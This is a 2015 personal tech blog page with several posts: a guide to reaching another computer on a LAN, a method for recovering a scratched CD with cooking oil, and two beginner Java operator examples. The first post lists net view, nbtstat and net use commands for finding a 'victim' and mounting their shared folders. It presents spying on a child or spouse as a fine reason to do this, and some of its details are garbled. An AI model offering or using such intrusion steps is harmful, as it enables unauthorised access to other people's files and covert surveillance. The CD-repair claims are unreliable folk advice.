Saturday, January 31, 2015

how to hack a computer in LAN



Hacking a computer in LAN is a useful and an important skill to pick up. Below are instructions for getting past a password (if you find yourself logged out of a computer or want to check up on your child or spouse), gaining remote access to a computer (to check on a user or help locate a stolen machine), or crack a wifi password (in the event of an emergency, such as if you become lost in an unfamiliar city and you need to look up directions).
Follow these steps to hack and access computer in LAN.

step 1

go to command prompt and type cmd  and type net view this command will show all the computers that are connected to your network

step 2

then type tracert"the name of the computer" this will give you the ip of the victim, or u can simply use an ip scanner to get the victim ip   

step 3

type nbtstat -a "ip address"   eg: nbstat -a 10.0.33.79  and hit enter; if the result shows a value of 20 you can proceed if not get the hell out of there. 

step 4

type net view \\ "ip"  eg:net view \\10.0.33.79  and hit enter  this will show you the folders > drivers which u shared by the victim   

step 5

now type net use L: \\ip\the file which he sharedeg:net use L: \\10.0.33.79\Users (i have given "L" is just for an example you can give any letter except the driver names which are not in the computer like C,E.D,F)and hit enter if the command completed succesfully go to my computer there you will see a new drive which is of the name of the ip  now you can explore it and can do anything

Friday, January 30, 2015

How to recover scratched CD.


Here is an old thecnique to how to recover damaged or scratched disks
with some lost of data. In this case i have one borrowed game - MAX PAYNE 2
with a chunck of 4 mb lost with a scratch in CD1 Install. Here we cover some
special thecniques of how to create a full working CD from the scratched one.

First some tools will be needed:

1. Alcohol 120%
2. UltraISO
3. Windows XP/2000 (not tested on 95/98/me)
3. Small piece of cotton
4. Dry cleaner paper
5. Finally, oil for cooking.

Step -1 - Preparing the CD

Get the cotton and drop some water, start cleaning vertically the surface of CD.
Do it 3 times and dry the water with a piece of dry cleaner paper. With a new piece
of cotton, drop some oil for cooking and start to wet the surface like you are
washing the CD with the oil. Dry carefully now. Some particles of oil will stay on the
microsurface of the scrath. It's okay. Seems the oil helps the laser of the CD/DVD driver
to read the surface again. Sure this will work with small unreadable scratchs - some hard
scratchs loose parts of the surface of the CD where we have data and it's lost forever.
But if it is loosed try anyway. Whith this tip 80% of the small scratched CD's coud be
recovered.

Step-2 - Testing the CDWith Alcohol 120% make an ISO - image making wizard - and lets see if the app can
read the loosed surface. In my case Alcohol 120% had recovered 60% of the data.
This is not enough. Have tryed other appz, they do not recover all the data. But the
CD/DVD driver laser CAN recover all data in this case. the data is still there, what we do?

Step-3 - Making the new CD
With the main copy system of windows explorer you can do it. Just create one folder
with the same name of the CD label for future burn reference, and copy the CD content
to the folder. When the CD copy process find the scratch, in majority of the cases, it's
slow down the reading and will recover ALL loosed data.If not, it just tell you there's
an unreadable sector. In this case your CD is lost. But it's not my case, finally
windows explorer got all the data from the scratch and made a copy in the folder.
with the ultraISO, wrote the original CD label, drop the content of the folder and
save as Iso. You can Test the new CD just mounting the iso in the Alcohol 120%. In my
case i did ISO of the two discs from MAX PAYNE 2 and tested installing from the mounted
ISO. Works like a charm. I got the 4 mb lost again. So, I have burned the CD and now i
have a working copy from the scratched one.

Working of Conditional Operator in Java


http://indiancomputerwizard.blogspot.in/
Working of  Conditional Operator in Java
import java.util.Scanner;
class ConditionalOperator
{
public static void main(String args[])
{
int a,b,c,result;
Scanner input=new Scanner(System.in);
System.out.print("Enter the value of a b and c ");
System.out.println("");
a=input.nextInt();
b=input.nextInt();
c=input.nextInt();
result=(a>b)?((a>c)?a:c):((b>c)?b:c);
System.out.println("The largest no is: "+result);
}
}
OUTPUT
http://indiancomputerwizard.blogspot.in/

Increment and Decrement operators in Java



http://indiancomputerwizard.blogspot.in/
Increment and Decrement operators in Java
class IncrementOperator
{
 public static void main(String args[])
   {
     int m=10,n=20;
     System.out.println("m= " +m);
     System.out.println("n= " +n);
     System.out.println("++m= " + ++m);
     System.out.println("n++= " + n++);
     System.out.println("m= " +m);
     System.out.println("n= " +n);
   }
}
OUTPUT
http://indiancomputerwizard.blogspot.in/

Blog Archive